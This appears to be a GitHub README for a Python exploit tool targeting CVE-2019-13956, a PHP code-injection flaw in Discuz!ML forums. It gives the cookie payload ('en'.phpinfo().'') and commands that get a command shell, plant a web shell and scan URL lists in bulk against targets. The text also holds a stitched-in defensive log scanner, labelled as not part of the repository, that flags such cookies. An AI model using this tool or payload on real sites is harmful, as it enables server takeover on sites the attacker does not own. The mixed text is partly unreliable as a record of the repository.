Jungl3b00k/Discuz_RCE

Discuz ML RCE
CVE ID : CVE-2019-13956
URL: https://www.esoln.net/blog/2019/06/14/discuzml-v-3-x-code-injection-vulnerability/
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-13956
CVE Mitre : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13956



Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used).
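A defender-side check for the cookie abuse described above, as an added example that is not part of this repository's code: it flags any `*_language` cookie whose value is not a plain locale code. The log line format (`cookie="..."` field), the `_language` name suffix match, and the locale allowlist pattern are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate language value is a short locale code such as "en" or "zh-CN".
VALID_LANG = re.compile(r"[A-Za-z]{2,3}(?:[-_][A-Za-z0-9]{2,8})?")
# Assumption: each log line carries the request's Cookie header as cookie="...".
LOG_LINE = re.compile(r'^(?P<client>\S+) "(?P<request>[^"]*)" cookie="(?P<cookie>.*)"$')


def suspicious_language_cookies(cookie_header):
    """Return (name, decoded_value) for each *_language cookie that is not a locale code."""
    hits = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        # The prefix is random per installation, so match on the suffix only.
        if not sep or not name.endswith("_language"):
            continue
        # PHP percent-decodes cookie values, so decode before matching and reporting.
        value = unquote(value)
        if not VALID_LANG.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Yield (client, request, cookie_name, value) for every flagged cookie."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # line is not in the assumed format
        for name, value in suspicious_language_cookies(m["cookie"]):
            yield m["client"], m["request"], name, value


# Constructed sample lines; the flagged value is the one quoted in the CVE description.
SAMPLE = [
    '198.51.100.7 "GET /forum.php" cookie="4gH4_0df5_saltkey=abc; 4gH4_0df5_language=en"',
    '203.0.113.9 "GET /forum.php" cookie="4gH4_0df5_language=en\'.phpinfo().\'"',
    '203.0.113.9 "GET /forum.php" cookie="4gH4_0df5_language=en%27.phpinfo().%27"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same allowlist test can be applied at a reverse proxy or WAF to reject the request before it reaches the forum.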



Installation


python2.7
pip install -r requirements.txt


Help

python discuz_mlRce.py -h


Vulnerability Detection

python discuz_mlRce.py -u "http://www.example.cn/forum.php"


Getting Command Shell

python discuz_mlRce.py -u "http://www.example.cn/forum.php" --cmdshell


Getting Shell URL

python discuz_mlRce.py -u "http://www.example.cn/forum.php" --getshell


Scanning a List of URLs

python discuz_mlRce.py -f urls.txt

